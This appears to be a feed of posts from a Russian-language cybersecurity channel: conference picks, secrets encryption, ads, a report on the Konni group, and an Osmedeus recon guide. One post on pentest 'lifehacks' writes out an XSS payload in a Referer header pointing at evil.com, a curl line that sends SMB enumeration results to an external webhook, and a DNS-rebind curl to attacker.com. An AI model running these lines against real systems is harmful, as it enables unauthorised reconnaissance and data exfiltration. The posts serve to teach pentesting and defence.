ZeroDay | Кибербезопасность

Топ тем осени: EDR, CI/CD, контейнеры и ИИ в SOC 👋 Приветствую в мире цифровой безопасности! В этом посте расскажу о ключевых направлениях, за которыми стоит следить этой осенью: от обхода EDR и CI/CD до атак на контейнеры и ИИ в SOC. ⏺Как раз организаторы ZeroNights 2025 открыли программу конференции - уже можно смотреть доклады. Ниже написал о нескольких выступлениях, которые мне показались особенно показательными. ⏺Атаки на GitHub Actions и CI-инфраструктуру: Доклад о том, как легитимные механизмы CI могут быть использованы для выполнения произвольного кода. Разбираются цепочки атаки через зависимости, публичные репозитории и особенности триггеров workflow. Полезно тем, кто защищает supply chain. ⏺EDR в 2025: новые подходы к обходу: Исследователи делятся техниками, которые ещё не попали в массовые сигнатуры: комбинации syscalls, работа с ETW и малоиспользуемые ветки ядра. Интересно как для пентестеров, так и для аналитиков, работающих с поведением процессов. ⏺SOC против атак с использованием LLM: Доклад о ситуациях, когда злоумышленники обучают модели на логах или используют ИИ для генерации действий в инфраструктуре. Рассматриваются кейсы подделки уведомлений, автоматизации фишинга и «агентских» атак. ⏺Практика пентеста Kubernetes: Системный разбор того, как ошибки в RBAC, токены сервисных аккаунтов и уязвимые admission-контроллеры могут привести к эскалации до Control Plane. Хорошая база для тех, кто работает с контейнерными средами. ⏺Форензика контейнеров и ephemeral-сред: Выступление о том, какие артефакты остаются в слоях образов, overlay-файловых системах и runtime-следах. Важное направление для расследований инцидентов в модернизированной инфраструктуре. ⏺Полная программа уже есть на сайте конфы ZeroDay | #zeronights

Двойное шифрование секретов: когда и зачем нужно? 👋 Приветствую в мире цифровой безопасности! Сегодня расскажу, как повысить защиту секретов приложений и почему одного шифрования часто недостаточно. ⏺Секреты - это пароли, токены и ключи. Если хранить их как попало, они легко «утекут». В приложениях всё сложнее: вы не знаете, кто может видеть память программы и могут ли данные перехватить. Идея по сути простая: минимально держать секрет в памяти - получил, использовал и удалил. Так снижается шанс утечки через дампы памяти, снапшоты ВМ или трейсы упавших приложений. ⏺Проблема хранилищ секретов: Даже продвинутые СХС шифруют данные, но ключ для расшифровки хранится в памяти процесса. На «железе» это относительно безопасно, но в виртуализации можно незаметно сделать снапшот и получить доступ к секрету и ключу, а значит - расшифровать всё. А если ВМ много, то уследить сложно. ⏺Двойное шифрование, в чем разница: дополнительный слой шифрования. Например, в HashiCorp Vault или Deckhouse Stronghold EE: ➡️Данные шифруются AES в Storage. ➡️Ключ key для расшифровки хранится в памяти процесса. ➡️Снэпшот ВМ → секрет + ключ → всё расшифровано. ⏺С HSM (seal wrap) ситуация уже меняется: • Данные шифруются ещё одним ключом, который нельзя извлечь. • Даже если key утёк, данные в безопасности. • Cache можно отключить, чтобы минимизировать риск через снапшоты. ⏺Когда HSM нет: Используем транзитное шифрование: ключ хранится на другой ВМ или в другом дата-центре. Чтобы расшифровать данные, хакеру нужен синхронный снапшот двух ВМ, что почти невозможно. Делаем вторую часть? ZeroDay | #шифрование

Вечернее шоу в формате IT-конференции: в эфире Wylsacom и лидеры бигтеха На самом деле все наоборот: команда платформы Контур.Толк уже во второй раз проводит Толк Шоу — IT-конференцию в стиле вечернего шоу. Нет докладов и презентаций, есть классный ведущий, живые дискуссии, реальные кейсы, острые вопросы и много юмора. Среди спикеров — эксперты Мегафон, холдинга Т1, АРПП «Отечественный софт», университета RWB, VK Tech и другие. В программе:

-кейс-сессия с автором топовых обзоров Wylsacom о кибербезе, ИИ и цифровизации, -дискуссия: что ждет IT-рынок при изменении господдержки, -разговор о технологиях будущего — от квантового шифрования до нейролинков, -опыт коммуникаций от лидеров крупнейших распределенных команд.

Завершим все мощной прожаркой Толка и IT-стендапом. Подключайтесь онлайн 20 ноября в 12:00 мск. Участие бесплатное, но нужно зарегистрироваться: ссылка

ZeroDay | #мем

🔥 Лед и пламя: ужин с Selectel о S3-хранилищах ❄️ Как устроено S3-хранилище, способное обслуживать и огненные нагрузки, и замороженные петабайты данных, и какую выгоду от этого получают компании из разных отраслей? На бизнес-ужине эксперты Selectel расскажут: 💡 Как устроено S3 Selectel изнутри 💡 Зачем нужны разные типы хранения данных 💡 Как построить собственную дата-платформу на базе Selectel 💡 Реальный кейс использования S3 от секретного гостя А после выступлений — фуршет и неформальное общение с экспертами ☕️ 🗓 20 ноября, 19:00 📍оффлайн, Москва Смотрите полную программу и регистрируйтесь: https://slc.tl/chg3q Участие бесплатное, но нужно дождаться подтверждения вашей регистрации Реклама. АО "Селектел". erid:2W5zFJeQvzU

3 лайфхака для пентестинга 👋 Приветствую в мире цифровой безопасности! Расскажу о трех полезных фишках при пентесте. ⏺XSS в заголовки через Referer + webhook-лог: проходит через CSP, фиксирует кражу куки/токена без JS.

    
        GET /page HTTP/1.1
Host: target.example.com
Referer: https://evil.com/?xss={}
    

⏺Однострочный SMB-скан с enum4linux-ng + webhook-результат: Быстро собирает шары/юзеров, отправляет на webhook.

    
        enum4linux-ng -A target.example.com | curl -s -X POST https://webhook.site/your-id --data-binary @-{}
    

➡️Защита: фильтровать Referer, отключить NTLM где не нужно, мониторить 445/tcp. ⏺DNS-rebind через короткое TTL + webhook-ping: обходит локальные ограничения, подтверждает доступ к internal.

    
        echo "127.0.0.1 target.internal" > /tmp/rebind
curl -s --resolve attacker.com:80:127.0.0.1 https://webhook.site/your-id -d "rebind_success=$(date)"{}
    

➡️Защищаемся так: DNS с анти-rebind, проверка Host заголовка, запрет external DNS в internal. ZeroDay | #пентест

Локализация персональных данных: как соответствовать требованиям и не получить штраф? 🤔 Встретимся 20 ноября в 12:00 МСК на бесплатном вебинаре Selectel и Lukash & Partners, чтобы узнать о новых требованиях по локализации персональных данных с 1 июля 2025 года. Эксперты по информационной безопасности Selectel и Luckash & Partners поделятся актуальными изменениями в законодательстве. На вебинаре вы: 🔸 выясните, какие подходы помогут выполнить требования к локализации; 🔸 узнаете, сколько времени займет правовой аудит; 🔸 увидите, какая инфраструктура подойдет для хранения данных. Подключайтесь онлайн — получите бесплатную юридическую консультацию и миграцию в облако за 0₽. Регистрируйтесь по ссылке ➡️ https://slc.tl/xu2bz Реклама. АО "Селектел". erid:2W5zFJEwEwJ

Корейские хакеры удаленно стирали данные с помощью Google Find Hub 👋 Приветствую в мире цифровой безопасности! Расскажу, как северокорейская группа Konni использовала обычные функции Google, чтобы красть данные и удалять их с устройств жертв. ⏺Что это было: группа Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, Vedalia) рассылала вредоносное ПО под видом приложений для снятия стресса. С помощью фишинговых писем и компрометации ПК они крали учётные данные Google жертв, а затем через Find Hub инициировали удалённую очистку устройств. ⏺Как это было: заражённый ПК оставался под наблюдением более года. Группировка использовала Lilith RAT и EndRAT для шпионажа, управления системой и кражи данных из Google и Naver. Автоматизированные скрипты запускались каждую минуту, выполняя команды на заражённых машинах - от скачивания и загрузки файлов до удаления данных. ⏺Последствия - печальны: люди потеряли личные данные без возможности восстановить их. Хакеры также чистили почту, удаляли уведомления Google и подчищали следы активности, чтобы скрыть свои действия. ⏺Konni использовали Remcos RAT, Quasar RAT и RftRAT, а атаки были ориентированы на корейских пользователей. Google отметил, что уязвимостей в Android или Find Hub не было - атака требовала компрометации ПК и кражи учётных данных. ZeroDay | #история

Osmedeus: автоматизируем рекон 👋 Приветствую в мире цифровой безопасности! Поговорим о еще одном инструменте безопасности. ⏺Osmedeus - workflow‑движок для рекона: собирает подписи, пробегает словари, складывает результаты и масштабируется на аж сотню целей. Идея простая - не выполнять по 100 скриптов вручную. ⏺Супер легко кастомить и масштабировать: свои воркфлоу, свои wordlists, режимы «gentle/aggressive», бэкапы воркспейсов и cron‑запуски. ⏺Для начала установим:

    
        # автоматическая install-скрипт
bash <(curl -fsSL https://raw.githubusercontent.com/osmedeus/osmedeus-base/master/install.sh)

# или сборка из исходников (Go >=1.17)
go install -v github.com/j3ssie/osmedeus@latest{}
    

Простой скан (general flow)

    
        osmedeus scan -t sample.com{}
    

⏺Исключить модули (например, скриншоты и spider)

    
        osmedeus scan -t sample.com -x screenshot -x spider{}
    

Запуск конкретного модуля (content discovery из файла с URL)

    
        osmedeus scan -m content-discovery -t http-file.txt{}
    

⏺Настройка скорости, потоков и чанков

    
        osmedeus scan --tactic gently -t sample.com
osmedeus scan --threads-hold=15 -f cidr -t 1.2.3.4/24
osmedeus scan --chunk --chunk-parts 20 -f cidr -t list-of-100-cidr.txt{}
    

ZeroDay | #Инструмент